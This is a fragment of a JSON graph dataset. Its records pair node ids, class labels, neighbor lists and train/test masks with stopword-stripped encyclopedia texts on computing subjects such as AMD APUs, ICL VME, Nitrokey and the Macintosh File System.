      7086,
      9774,
      9266,
      3511,
      1849,
      8250,
      9913,
      1728,
      10945,
      6978,
      7234,
      7492,
      6981,
      8514,
      7111,
      10820,
      11080,
      11337,
      2635,
      6618,
      5339,
      2524,
      2525,
      4188,
      2784,
      1377,
      2788,
      2277,
      3300,
      8937,
      5356,
      2285,
      9581,
      9964,
      1776,
      10606,
      11630,
      499,
      2420,
      6900,
      9076,
      2937,
      10109
    ],
    "mask": "Test"
  },
  {
    "node_id": 3586,
    "label": 3,
    "text": "AMD_Accelerated_Processing_Unit:amd accelerated processing unit amd accelerated processing unit apu formerly known fusion marketing term series 64-bit microprocessors advanced micro devices amd designed act central processing unit cpu graphics processing unit gpu single die amd announced first generation apus llano high-performance brazos low-power devices january 2011 second generation trinity high-performance brazos-2 low-power devices announced june 2012 third generation kaveri high performance devices launched january 2014 kabini temash low-power devices announced summer 2013 sony playstation 4 microsoft xbox one eighth generation video game consoles use semi-custom third generation low-power apus intel cpus integrated hd graphics also cpu gpu single die offer hsa features see amd fusion project started 2006 aim developing system chip combined cpu gpu single die amd took key step toward realising vision acquired graphics chipset manufacturer ati 2006 project reportedly required three internal iterations fusion concept create product deemed worthy release reasons contributing delay project include technical difficulties combining cpu gpu die 45 nm process conflicting views role cpu gpu within project first generation desktop laptop apu codenamed llano announced january 4 2011 2011 ces show las vegas released shortly thereafter featured k10 cpu cores radeon hd 6000-series gpu die fm1 socket apu low-power devices announced brazos platform based bobcat microarchitecture radeon hd 6000-series gpu die conference january 2012 corporate fellow phil rogers announced amd would re-brand fusion platform heterogeneous system architecture hsa stating fitting name evolving architecture platform representative entire technical community leading way important area technology programming development however later revealed amd subject trademark infringement lawsuit swiss company arctic used name fusion line power supply products second generation desktop laptop apu codenamed trinity announced amd 2010 financial analyst day released october 2012 featured piledriver cpu cores radeon hd 7000 series gpu cores fm2 socket amd released new apu based piledriver microarchitecture march 12 2013 laptops/mobile june 4 2013 desktops codename richland second generation apu low-power devices brazos 2.0 used exactly apu chip ran higher clock speed rebranded gpu radeon hd7000 series used new io controller chip semi-custom chips introduced microsoft xbox one sony playstation 4 video game consoles third generation technology released 14 january 2014 featuring greater integration cpu gpu desktop laptop variant codenamed kaveri based steamroller architecture low-power variants codenamed kabini temash based jaguar architecture november 2017 hp released envy x360 featuring ryzen 5 2500u apu first 4th generation apu based zen cpu architecture vega graphics architecture amd founding member heterogeneous system architecture hsa foundation consequently actively working developing hsa cooperation members following hardware software implementations available amd apu-branded products amd apus unique architecture amd cpu modules cache discrete-class graphics processor die using bus architecture allows use graphics accelerators opencl integrated graphics processor goal create fully integrated apu according amd eventually feature 'heterogeneous cores capable processing cpu gpu work automatically depending workload requirement first generation apu released june 2011 used desktops laptops based k10 architecture built 32 nm process featuring two four cpu cores thermal design power tdp 65-100 w integrated graphics based radeon hd6000 series support directx 11 opengl 4.2 opencl 1.2 performance comparisons similarly priced intel core i3-2105 llano apu criticised poor cpu performance praised better gpu performance amd later criticised abandoning socket fm1 one generation amd brazos platform introduced january 4 2011 targeting subnotebook netbook low power small form factor markets features 9-watt amd c-series apu codename ontario netbooks low power devices well 18-watt amd e-series apu codename zacate mainstream value notebooks all-in-ones small form factor desktops apus feature one two bobcat x86 cores radeon evergreen series gpu full directx11 directcompute opencl support including uvd3 video acceleration hd video including 1080p amd expanded brazos platform june 5 2011 announcement 5.9-watt amd z-series apu codename desna designed tablet market desna apu based 9-watt ontario apu energy savings achieved lowering cpu gpu northbridge voltages reducing idle clocks cpu gpu well introducing hardware thermal control mode bidirectional turbo core mode also introduced amd announced brazos-t platform october 9 2012 comprised 4.5-watt amd z-series apu codenamed hondo a55t fusion controller hub fch designed tablet computer market hondo apu redesign desna apu amd lowered energy use optimizing apu fch tablet computers deccan platform including krishna wichita apus cancelled 2011 amd originally planned release second half 2012 first iteration second generation platform released october 2012 brought improvements cpu gpu performance desktops laptops platform features 2 4 piledriver cpu cores built 32 nm process tdp 65 w 100 w gpu based radeon hd7000 series support directx 11 opengl 4.2 opencl 1.2 trinity apu praised improvements cpu performance compared llano apu release second iteration generation 12 march 2013 mobile parts 5 june 2013 desktop parts january 2013 jaguar-based kabini temash apus unveiled successors bobcat-based ontario zacate hondo apus kabini apu aimed low-power subnotebook netbook ultra-thin small form factor markets temash apu aimed tablet ultra-low power small form factor markets two four jaguar cores kabini temash apus feature numerous architectural improvements regarding power requirement performance support newer x86-instructions higher ipc count cc6 power state mode clock gating kabini temash amd first also first ever quad-core x86 based socs integrated fusion controller hubs fch kabini temash codenamed yangtze salton respectively yangtze fch features support two usb 3.0 ports two sata 6 gbit/s ports well xhci 1.0 sd/sdio 3.0 protocols sd-card support chips feature directx 11.1-compliant gcn-based graphics well numerous hsa improvements fabricated 28 nm process ft3 ball grid array package taiwan semiconductor manufacturing company tsmc released may 23 2013 playstation 4 xbox one revealed powered 8-core semi-custom jaguar-derived apus third generation platform codenamed kaveri partly released january 14 2014 kaveri contains four steamroller cpu cores clocked 3.9 ghz turbo mode 4.1 ghz 512-core graphics core next gpu two decode units per module instead one allows core decode four instructions per cycle instead two amd trueaudio mantle api on-chip arm cortex-a5 mpcore release new socket fm2+ ian cutress rahul garg anandtech asserted kaveri represented unified system-on-a-chip realisation amd acquisition ati performance 45 w a8-7600 kaveri apu found similar 100 w richland part leading claim amd made significant improvements on-die graphics performance per watt however cpu performance found lag behind similarly-specified intel processors lag unlikely resolved bulldozer family apus a8-7600 component delayed q1 launch h1 launch steamroller architecture components allegedly scale well higher clock speeds amd announced release kaveri apu mobile market june 4 2014 computex 2014 shortly accidental announcement amd website may 26 2014 announcement included components targeted standard voltage low-voltage ultra-low voltage segments market early-access performance testing kaveri prototype laptop anandtech found 35 w fx-7600p competitive similarly-priced 17 w intel i7-4500u synthetic cpu-focused benchmarks significantly better previous integrated gpu systems gpu-focused benchmarks tom hardware reported performance kaveri fx-7600p 35 w intel i7-4702mq finding i7-4702mq significantly better fx-7600p synthetic cpu-focused benchmarks whereas fx-7600p significantly better i7-4702mq intel hd 4600 igpu four games could tested time available team",
    "neighbors": [
      3588,
      6151,
      5645,
      10260,
      7712,
      9255,
      2094,
      5681,
      6705,
      7218,
      7234,
      11331,
      7247,
      4695,
      7788,
      1137,
      1651,
      3197,
      638,
      8322,
      3204,
      8327,
      10375,
      2719,
      4767,
      4276,
      9400,
      2237,
      3783,
      2764,
      5840,
      5329,
      9427,
      11485,
      5858,
      5859,
      1260,
      5356,
      4334,
      9964,
      1776,
      9475,
      5380,
      8452,
      4872,
      7963,
      9500,
      2850,
      11047,
      1832,
      1322,
      1329,
      3892,
      6978,
      11080,
      9551,
      9057,
      4451,
      8035,
      8036,
      8044,
      876,
      6001,
      2935,
      11130,
      9092,
      3464,
      398,
      7058,
      8090,
      2463,
      9122,
      10658,
      5541,
      11183,
      10675,
      8629,
      9157,
      1480,
      977,
      5073,
      7122,
      473,
      7132,
      2525,
      1510,
      5606,
      1005,
      7151,
      499,
      2549,
      3070
    ],
    "mask": "Test"
  },
  {
    "node_id": 3587,
    "label": 3,
    "text": "Language-based_system:language-based system language-based system type operating system uses language features provide security instead addition hardware mechanisms systems code referred trusted base responsible approving programs execution assuring perform operations detrimental system stability without first detected dealt common strategy guaranteeing operations impossible base system around high-level language java whose design precludes dangerous constructs many entirely written language minimum amount low-level code used since language-based systems assure ahead time things damage system corrupting memory dereferencing dangling pointers possible avoid expensive address space switches needed traditional oses microkernels popular traditional systems extreme form high-level language computer architecture trusted base pushed hardware entire system written high-level language",
    "neighbors": [
      1954,
      6979,
      8262,
      3624,
      9931,
      5677,
      7983,
      5714,
      5363,
      7187,
      9330,
      9331
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3588,
    "label": 3,
    "text": "Super_Socket_7:super socket 7 super socket 7 also referred super 7 hardware-level extension socket 7 zif socket specification x86 processors compatible motherboards chipsets utilize standard socket 7 connection cpu adding certain features including maximum 100 mhz front-side bus support agp graphics cards super socket 7 used amd k6-2 k6-iii processors final cyrix m-ii processors final idt winchip 2 processors rise mp6 processors backward compatible socket 7 cpu meaning socket 7 cpu used super socket 7 motherboard super socket 7 cpu operate full speed socket 7 motherboard socket 5 cpus pin-compatible super socket 7 motherboards designed super socket 7 supported voltages needed socket 5 cpus amd previously always used intel sockets processors socket 7 last one amd retained legal rights intel hoped discontinuing socket 7 development moving slot 1 amd would left outdated platform making processors non-competitive extending fsb 66 100 mhz super socket 7 gave amd stopgap solution needed developing independent motherboard infrastructure slot architecture cheap served intended purpose many third party chipsets provided via sis others low quality especially regard agp implementations reputation amd gained buggy incompatible motherboards lingered though internal program via raise standards chipsets begun show results k6-iii pentium iii era amd put place quality assurance program athlon processor",
    "neighbors": [
      3586,
      9475,
      8452,
      3464,
      4872,
      1677,
      5901,
      7058,
      10260,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      2463,
      799,
      4767,
      6175,
      7712,
      7714,
      9122,
      10019,
      1322,
      3883,
      2604,
      4523,
      2350,
      11183,
      6192,
      1329,
      9649,
      3892,
      8629,
      9400,
      7105,
      6978,
      11331,
      4805,
      7110,
      3783,
      9157,
      8394,
      3403,
      4427,
      7247,
      9551,
      7122,
      9427,
      3798,
      4185,
      7002,
      9945,
      7132,
      2525,
      1501,
      11484,
      4451,
      5859,
      613,
      10468,
      2791,
      8552,
      8442,
      1260,
      1005,
      4717,
      7151,
      7788,
      10225,
      371,
      1651,
      3194
    ],
    "mask": "Test"
  },
  {
    "node_id": 3589,
    "label": 1,
    "text": "Clinical_Practice_Research_Datalink:clinical practice research datalink clinical practice research datalink cprd observational interventional research service operates part uk department health jointly funded national institute health research nihr medicines healthcare products regulatory agency mhra cprd working closely extensive primary care topic specific comprehensive nihr research networks nhs digital programme would develop current organisation initially developed essex general practitioner dr alan dean facilitate day-to-day management general practice collaboration staff bata shoe factory east tilbury near practice early programmers included czech programmer jan boda 1987 venture capital company set named value added information medical products ltd vamp recruit practices form information base early development team three marcella devenish formerly midwife philip lee-warren formerly senior medical laboratory scientific officer leadership kieran o'mally developed computerised system using bos microcobol development environment period number uk practices using software product igp integrated general practice expanded hundred two half thousand return anonymous healthcare data vamp ltd offered gps cash equivalent gbp 500 month order build vamp research databank research purposes 1988 vamp research databank comprised 57 practices 543,100 patients figure doubled 1.2 million 1990 one year later 970 practices allowed vamp access data 1000 practices straightforward maintenance agreement vamp november 1993 parent company acquired reuters health information donated database department health 1994 time became general practice research database gprd contained data 650 practices 4.4 million active patients time two licensees data dr alan dean professor hershel jick database operated office national statistics 1999 point medicines control agency mca took agency became medicines healthcare products regulatory agency mhra 1 april 2003 following merger medical devices agency mda since use database expanded within uk overseas gprd run sub-division mhra direction dr john parkinson research utility gprd dramatically enhanced linkage datasets individual patient level external datasets included hospital episode statistics death certificates national cancer registry minap cardiovascular disease registry additionally dataset became choice fda major pharma companies following announcement chancellor plan growth commissioned study entitled research capability programme initiated aim assessing available research capabilities uk future potential growth areas sector opportunity identified collaboration department health mhra creating joint research service based upon consolidating expanding existing independent services new service known cprd developed meet expectations criteria outlined plan growth 29 march 2012 medicines healthcare products regulatory agency department health national institute health research nihr launched clinical practice research datalink cprd launch cprd sir kent woods chief executive mhra said clinical practice research datalink provide new data research services improve health patients also make uk world leader life sciences research david willetts minister universities science said uk world leader life sciences research base industry tell us could make better use data order drive medical breakthroughs clinical practice research datalink provide researchers access safeguarded data respects patient confidentiality give valuable insights serious health conditions ultimately help reduce time takes develop new treatments gprd became part data services provision cprd launch april 2012 cprd established new england-wide nhs observational interventional research service built research developments gprd also health research support service hrss previously managed nihr research capability program cprd remains housed within medicines healthcare products regulatory agency one three 'centres within agency cprd builds predecessors capabilities aims provide range services products areas medical research public health care fundamental work cprd collection linkage anonymised data sets provision research services cprd utilises maximum benefit linked data sets uk ’ health system provide researchers access high quality anonymous primary secondary health care data data collected allows researchers access wealth information including nhs provides free point delivery healthcare population 52 million england access data sets nhs england wales scotland northern ireland cprd provide population potentially 64 million patients uk access partnerships established include data sets european countries linking anonomysed primary care data large data registries related data sets means cprd offer huge array data information inclusion medical research studies include areas prescription drugs uses effect long term patient treatment strategy long term health benefit studies epidemic pandemic studies demographic health welfare studies example analysis 100 million gp consultations using cprd data 2016 provided first substantial evidence increase gp clinical workload england cprd range research experience expertise including cprd provides consulting services range research activities provided experienced internal team research service offers advice research methodology research governance well host services drawing expertise predecessors experience cprd research team built reputation conducting high-end research projects protocol development gaining approvals research data analysis report publication writing research capacity cprd resource expertise undertake research projects behalf customers independently variety undertakings commercial regulatory charitable academic sectors huge range studies cprd predecessors published list published papers found cprd research cprd offers range interventional research services facilitate running clinical trials primary health care data collected cprd taken participating gp surgeries united kingdom personal identifiers collected protecting privacy individuals data comes data collected includes",
    "neighbors": [
      626
    ],
    "mask": "Test"
  },
  {
    "node_id": 3590,
    "label": 4,
    "text": "Nitrokey:nitrokey nitrokey open source usb key enable secure encryption signing data secret keys always stored inside nitrokey protects malware computer viruses attackers user-chosen pin tamper-proof smart card protect nitrokey case loss theft hardware software nitrokey available open source free software open hardware enables independent parties verify security device nitrokey supported microsoft windows linux macos 2008 jan suhr rudolf böddeker another friend travelling found looking use encrypted emails internet cafés meant secret keys remain secure computer viruses proprietary usb dongles existed time lacked certain ways consequentially established open source project crypto stick august 2008 grew become nitrokey spare-time project founders develop hardware solution enable secure usage email encryption first version crypto stick released 27 december 2009 late 2014 founders decided professionalize project renamed nitrokey nitrokey firmware audited german cybersecurity firm cure53 may 2015 hardware audited company august 2015 first four nitrokey models became available 18 september 2015 several nitrokey models exist nitrokey pro flagship model contains following features upcoming nitrokey storage provides features nitrokey pro additionally contains encrypted mass storage nitrokey developers believes proprietary systems ca n't provide strong security security systems need open source instance cases nsa intercepts security devices shipped implanted backdoors 2011 rsa hacked secret keys securid tokens stolen allowed hackers circumvent authentication revealed 2010 many fips 140-2 level 2 certified usb storage devices various manufacturers could easily cracked using default password nitrokey open source transparency wants provide high secure system avoid security issues proprietary rivals facing nitrokey mission provide best open source security key protect digital lives users",
    "neighbors": [
      11046,
      10631,
      11175,
      2154,
      11211,
      3309,
      6797,
      7887,
      1297,
      2228,
      823,
      11418,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 3591,
    "label": 1,
    "text": "Propagation_constraint:propagation constraint database systems propagation constraint details happen related table update row rows target table paul beynon-davies 2004 p.108 tables linked using primary key foreign key relationships possible users update one table relationship way relationship longer consistent known breaking referential integrity example breaking referential integrity table employees includes department number 'housewares foreign key table departments user deletes department department table housewares employees records would refer non-existent department number propagation constraints methods used relational database management systems rdbms solve problem ensuring relationships tables preserved without error database textbook beynon-davies explains three ways rdbms handle deletions target related tuples",
    "neighbors": [
      10628,
      7080,
      10632,
      6860,
      5401
    ],
    "mask": "None"
  },
  {
    "node_id": 3592,
    "label": 4,
    "text": "Evil_bit:evil bit evil bit fictional ipv4 packet header field proposed rfc 3514 humorous april fools day rfc 2003 authored steve bellovin rfc recommended last remaining unused bit reserved bit ipv4 packet header used indicate whether packet sent malicious intent thus making computer security engineering easy problem simply ignore messages evil bit set trust rest evil bit become synonym attempts seek simple technical solutions difficult human social problems require willing participation malicious actors particular efforts implement internet censorship using simple technical solutions joke freebsd implemented day removed changes following day linux patch implementing iptables module ipt_evil posted next year furthermore patch freebsd 7 available kept up-to-date extension xmpp protocol xep-0076 malicious stanzas inspired evil bit rfc also quoted otherwise completely serious rfc 3675 .sex considered dangerous may caused proponents .xxx wonder whether internet engineering task force ietf commenting application top-level domain tld document related application april fool 2010 google added codice_1 parameter requests ajax apis",
    "neighbors": [
      3218,
      11413,
      3742,
      10924,
      6319,
      562,
      6456,
      4797,
      4158,
      3006,
      64,
      7364,
      2887,
      5469,
      5470,
      10341,
      10344,
      11112,
      5102,
      8432,
      6651,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3593,
    "label": 7,
    "text": "WeVideo:wevideo wevideo u.s.-headquartered software service company provides collaborative web-based video editing platform works browser company formed 2011 based menlo park california wevideo inc. founded april 2011 initially creaza inc. creaza inc. owns related company norway called creaza education provides suite digital tools k-12 market including comic tools audio editing mind-mapping video editing applications wevideo publicly launched services september 2011 changing name creaza inc. allay confusion creaza education reflect social collaborative nature platform shortly 2011 launch wevideo invited youtube become youtube create partner embedded wevideo editor one number solutions offered youtube help users create better video compositions april 2012 wevideo announced launch partner google drive google ’ cloud-based collaboration storage service michael j. miller ziff brothers investments cited wevideo one favorites 2011 demo fall conference stating presents strong cloud-based consumer video editing solution network world also named wevideo one highlights conference labeling something keep eyes seattle times praised wevideo ability allow multiple editors work video noted videos five editors would require paid membership tech evangelist robert scoble noted wevideo ’ unique collaboration features stated “ wevideo yet another demonstration everything changing due cloud even video editing ” since inception wevideo received number awards including following",
    "neighbors": [
      467,
      10227
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3594,
    "label": 2,
    "text": "ICL_VME:icl vme vme virtual machine environment mainframe operating system developed uk company international computers limited icl part fujitsu group originally developed 1970s vme/b later vme 2900 drive icl new 2900 series mainframes operating system known openvme incorporating unix subsystem runs icl series 39 trimetra mainframe computers well industry-standard x64 servers development program new range system started merger international computers tabulators ict english electric computers 1968 one fundamental decisions would feature new operating system number different feasibility design studies carried within icl three notable chief architect vme/b brian warboys subsequently became professor software engineering university manchester number influences seen design example multics icl earlier george 3 operating system however essentially designed scratch vme viewed primarily competing system/360 ibm mainframe commercial operating system adopted ebcdic character encoding creation mid-1970s constraints compatible earlier operating systems vme many ways modern architecture today unix derivatives unix designed 1960s microsoft windows started operating system single-user computers still betrays origins new range first launched october 1974 operating system referred system b time first delivered become vme/b vme/k developed independently according campbell-kelly whim ed mack delivered later smaller mainframes 2960 following financial crisis 1980 new management brought icl christopher laidlaw chairman robb wilmot managing director early decision new management drop vme/k thus july 1981 vme2900 launched although presented customer base merger vme/b vme/k reality vme/b base selected features vme/k grafted provided opportunity drop obsolescent features remained available customers needed form bonvme option 2900 suffix dropped system version 213 sv213 icl launched series 39 1985 successor original 2900 series open prefix added sv294 vme became capable hosting applications written originally unix unix system v release 3 based subsystem called vme/x adapted run vme using ascii character encoding 2007 fujitsu announced vme version run hosted subsystem called supernova within microsoft windows suse red hat enterprise linux x86-64 hardware 2012 vme user group axis announced almost 40 years would disbanding reduced user base vme structured set layers layer access resources different levels abstraction virtual resources provided one layer constructed virtual resources offered layer access resources layer controlled set access levels order process use resource particular access level must access key offering access level concept similar rings protection multics architecture allows 16 access levels outer 6 reserved user-level code orthogonally access levels operating system makes resources available applications form virtual machine virtual machine run multiple processes practice vme virtual machine closer concept process operating systems vme process like thread allocation resources virtual machine uses stack model stack popped resources allocated stack level released calls application operating system therefore made call retains process stack change protection level resulting efficiency system calls one features makes architecture competitive communication virtual machines achieved means events named communication channels shared memory areas hardware architecture also provides semaphore instructions inct increment-and-test tdec test-and-decrement files persistent objects recorded repository called catalogue unlike operating systems file naming hierarchy independent location file particular tape disk volume days need offline storage made easy keep track files regardless location move files locations without renaming well files catalogue keeps track users user groups volumes devices network connections many resources metadata files held object called file description catalogue probably first example would later called entity-relationship database interrupts handled creating new stack frame stack relevant process handling interrupt using new environment popping stack return interrupted process run-time exceptions referred contingencies captured object program error handler opeh produce report equivalent stack trace either interactively written journal compiled object code maintained format called omf object module format unlike many operating systems also format used loader various compilers available well utilities notably collector links code several omf modules single module efficient loading run-time module amender allows patching instructions omf module fix bugs using assembly language syntax command language vme known scl system control language much recognizably typed high-level programming language job control shell languages found operating systems likened scripting languages javascript though surface syntax derived algol 68 scl designed allow line-at-a-time interactive use console command file creation executable scripts programs language compiled object module format way vme programming language declaration procedure within scl also acts definition simple form template allowing procedure invoked interactive terminal fields validated according data types underlying procedure parameters using default procedure parameter values built-in command vocabulary uses consistent naming convention imperative verb followed noun example delete_file display_library_details command written full abbreviated form combines standard abbreviations verb noun example xf x delete f file dlbd display lb library details scl block-structured begin/end blocks serving dual complementary roles defining lexical scope variable declarations defining points resources acquired operating system released variables language accessible applications form environment variables number simple types strings superstrings sequences strings booleans integers also used contain references system resources files network connections possible disassemble scl program omf back scl source code using read_scl rscl command however output always perfect often include errors would stop re-compilation without user intervention simple code example seen 99 bottles beer website realistic example scl used compile program written s3 shown example taken columbia university archive implementations kermit commands illustrated fragment include whenever declares error handling policy assign_library binds local name file directory delete_file makes permanent file temporary deleted end block s3_compile compiles program written s3 command breaks usual verb-noun convention new_message_text_module creates module containing parameterized error messages suitable localization compile_scl compiles scl program object code collect command combines different object code modules single module driven local command file incorporated inline scl delimiters -- -- ++++ sub-commands input newmodule identify names input output modules suppress retain determine external visibility named procedures within collected module listmodule requests report describing output module note used separate parts hierarchic file name leading asterisk denotes local name library bound using assign_library command number parentheses file name version number operating system associates version number every file requests file get latest version unless specified otherwise creating new file default create next version leave previous version intact program however deliberately choosing create version 101 identify public release result icl heavy involvement delivery computer services uk public sector particular special security requirements opcon ccis early entrant market secure systems vme formed core icl activities secure systems arena advantage last large-scale operating system ever designed one built scratch underlying architecture encompassed many primitives needed develop secure system particular hardware assisted access control registers acr limit privileges could taken process including users led uk government central computing telecommunications agency ccta funding project spaceman mid 1980s icl defence technology centre dtc develop enhanced security variant vme icl launched pair complementary products commercial release called high security option hso public sector release including government furnished encryption gfe technologies called government security option gso hso gso formally tested cesg uk security evaluation scheme one predecessors itsec common criteria became first mainstream operating system formally certified series 39 range introduced nodal architecture novel implementation distributed shared memory seen hybrid multiprocessor system cluster design machine consists number nodes node contains order-code processor cpu main memory virtual machines typically located one time one node capability run node relocated one node another discs peripherals shared nodes nodes connected using high-speed optical bus used provide applications virtual shared memory memory segments marked shared public global segments replicated node updates broadcast inter-node network processes use unshared memory segments nodal local run complete isolation nodes processes vme originally written almost entirely s3 specially-designed system programming language based algol 68r however vme/k written primarily sfl assembly language although high-level language used operating system designed independent underlying hardware architecture contrary software hardware architecture closely integrated early 1990s onwards entirely new vme subsystems written partly wholly c programming language earliest days vme developed aid software engineering repository known cades built purpose using underlying idms database cades merely version control system code modules manages aspects software lifecycle requirements capture field maintenance cades used vme module development hold separate definitions data structures modes constants literals procedural interfaces core algorithms multiple versions 'lives components could exist algorithms written system development language sdl converted s3 source pre-processor multiple versions modules could generated application development tools offered vme fall two categories toolset vme unusually homogeneous customers using core set languages tools result tools also well integrated third-party tools made relatively little impression many years large majority vme users wrote applications cobol usually making use idms database tpms transaction processing monitor programming languages included fortran pascal algol 68rs coral 66 rpg2 served minority interests later mid 1980s compilers c became available within outside unix subsystem largely enable porting software relational database systems interesting pl/i subset compiler written eec assist porting programs ibm icl hardware compilers developed within icl share common architecture cases share components code-generators many compilers used module named alice assembly language internal common environment produced early form precompiled code p-code termed rose making compiled object module format omf libraries loadable machine range primary language used developing vme operating system system software compilers transaction processing monitors s3 high level language based many ways algol 68 data types low-level functions operators aligned closely architecture 2900 series assembly language sfl system function language also available used development vme/k whose designers confident high-level language could give adequate performance also idms database system account origins third-party product sfl originally called macro assembler programming language maple 2900 architecture positioned consisting high level language machines name changed request icl marketing developed part toolkit system subsequently cancelled related families assemblers architectures calm-xx running vme palm-xx developed pascal running various hosts developed internal use neither s3 sfl ever promoted commercial development tool end-user applications neither normally delivered standard part operating system explicitly marketed products right sfl s3 however available options user organisations third parties specific need quickbuild application development environment vme highly successful despite fact applications largely locked vme environment environment centred data dictionary system dds also called opendds early successful attempt build comprehensive repository supporting tools full support development lifecycle well database schemas file record descriptions dictionary keeps track objects reports queries screen designs 4gl code also supports variety models requirements capture level entity-relationship models process models quickbuild 4gl packaged two forms high-level declarative languages using jackson structured programming design paradigm applicationmaster unusual approach application design focuses user session running single conversational process completely hiding complexity maintaining state across user interactions 4gl tools screen designer work dds dictionary also holds database schemas considerable reuse metadata rarely achieved 4gls",
    "neighbors": [
      512,
      2179,
      3462,
      4998,
      3594,
      6797,
      6675,
      10387,
      406,
      5658,
      7847,
      6187,
      7983,
      9137,
      2995,
      8502,
      4151,
      4410,
      1606,
      8262,
      8904,
      9286,
      1611,
      8524,
      3791,
      5455,
      5457,
      2264,
      477,
      5730,
      10467,
      3816,
      5356,
      2541,
      9330,
      3443,
      4595,
      5492,
      6772,
      3960,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3595,
    "label": 4,
    "text": "SpyHunter_(software):spyhunter software spyhunter anti-spyware computer program microsoft windows windows xp later operating system designed remove malware trojan horses computer worms rootkits malicious software spyhunter currently version 4 receives daily definition updates spyhunter free version allows user scan computer purchase required remove found malware paid version user able receive support built-in helpdesk february 2016 enigma software filed lawsuit bleeping computer computer support website alleged latter engaged smear campaign purpose driving potential customers away spyhunter affiliate competing products turn bleeping computer filed lawsuit enigma software also alleged smear campaign march 2017 enigma software announced press release settlement reached lawsuit bleeping computer cases would dismissed october 2016 enigma software filed lawsuit popular security software vendor malwarebytes lawsuit arose malwarebytes software began targeting spyhunter potentially unwanted program november 7 2017 enigma case dismissed us district court",
    "neighbors": [
      10756,
      9771,
      6797,
      7983,
      4374,
      2041,
      7515,
      11225,
      9791
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3596,
    "label": 3,
    "text": "Dennard_scaling:dennard scaling dennard scaling also known mosfet scaling scaling law based 1974 paper co-authored robert h. dennard named originally formulated mosfets states roughly transistors get smaller power density stays constant power use stays proportion area voltage current scale downward length dennard observes transistor dimensions scaled 30 0.7x every technology generation thus reducing area 50 reduces delay 30 0.7x therefore increases operating frequency 40 1.4x finally keep electric field constant voltage reduced 30 reducing energy 65 power 1.4x frequency 50 therefore every technology generation transistor density doubles circuit becomes 40 faster power consumption twice number transistors stays moore law says number transistors doubles every two years combined dennard scaling means performance per watt grows rate doubling every two years trend referred koomey law rate doubling originally suggested koomey 1.57 years somewhat faster doubling period moore law recent estimates suggest slowing dynamic switching power consumption cmos circuits proportional frequency historically transistor power reduction afforded dennard scaling allowed manufacturers drastically raise clock frequencies one generation next without significantly increasing overall circuit power consumption since around 2005–2007 dennard scaling appears broken 2016 transistor counts integrated circuits still growing resulting improvements performance gradual speed-ups resulting significant frequency increases primary reason cited breakdown small sizes current leakage poses greater challenges also causes chip heat creates threat thermal runaway therefore increases energy costs breakdown dennard scaling resulting inability increase clock frequencies significantly caused cpu manufacturers focus multicore processors alternative way improve performance increased core count benefits many though means workloads increase active switching elements multiple cores still results increased overall power consumption thus worsens cpu power dissipation issues end result fraction integrated circuit actually active given point time without violating power constraints remaining inactive area referred dark silicon",
    "neighbors": [
      2273,
      3882,
      7006
    ],
    "mask": "None"
  },
  {
    "node_id": 3597,
    "label": 3,
    "text": "Whitechapel_Computer_Works:whitechapel computer works whitechapel computer works ltd. wcw computer workstation company formed east end london united kingdom april 1983 investment greater london enterprise board department trade industry first workstation model mg-1 named milliard gargantubrain hitchhiker guide galaxy mg-1 based national semiconductor ns32016 microprocessor 1024 × 800 pixel monochrome display 40 mb rodime st-506 hard disk optional ethernet interface initially natsemi genix operating system port 4.1bsd unix provided later replaced port 4.2bsd called 42nix mg-1 also partially kernel-based graphical user interface called oriel mg-1 first shipped customers 1984 base price around although oriel released following year distributor united states mg-1 sold north america cybertool systems ltd. 1984 1986 colour version cg-1 also announced 1986 followed mg-200 ns32332 processor 1987 wcw went receivership 1986 soon revived whitechapel workstations ltd. go liquidation april 1988 new company launched hitech-10 hitech-20 workstations r2000 r3000 mips architecture processors respectively ran umips variant unix either x11 news-based guis aimed computer animation applications ex-whitechapel engineers went form algorithmics ltd. specialising mips-based embedded systems algorithmics later acquired mips technologies 2002 rights hitech workstations acquired mistral computer systems ltd. june 1988",
    "neighbors": [
      7234,
      426,
      6250,
      783,
      7983,
      8179,
      3350
    ],
    "mask": "Train"
  },
  {
    "node_id": 3598,
    "label": 6,
    "text": "Macintosh_File_System:macintosh file system macintosh file system mfs volume format disk file system created apple computer storing files 400k floppy disks mfs introduced original apple macintosh computer january 1984 mfs notable introducing resource forks allow storage structured data storing metadata needed support graphical user interface mac os mfs allows file names 255 characters length although finder allow users create names longer 63 characters 31 characters later versions mfs called flat file system support hierarchy directories folders exist concept original mfs-based macintosh work completely differently way modern systems visible finder windows open save dialog boxes always one empty folder volume altered way adding renaming files new empty folder appears thus providing way create new folders mfs stores file directory listing information single file finder creates illusion folders storing files pairs directory handles file handles display contents particular folder mfs scans directory files handle need find separate file containing directory listing macintosh file system support volumes 20 mb size 1,400 files small today standards time seemed expansive compared macintosh 400 kb floppy drive apple introduced hierarchical file system replacement mfs september 1985 mac os 7.6.1 apple removed support writing mfs volumes mac os 8.0 support mfs volumes removed altogether although macos built-in support mfs example vfs plug-in apple called mfslives provides read-only access mfs volumes",
    "neighbors": [
      5120,
      2564,
      1542,
      6669,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      1592,
      7225,
      11323,
      576,
      8772,
      7244,
      1109,
      3167,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      7163,
      10951,
      713,
      9420,
      7378,
      3795,
      4819,
      213,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      6377,
      8938,
      4844,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3324,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      11037,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      4910,
      7983,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      9035,
      4431,
      5969,
      346,
      2395,
      8540,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      8075,
      7053,
      7565,
      5520,
      6545,
      5013,
      11675,
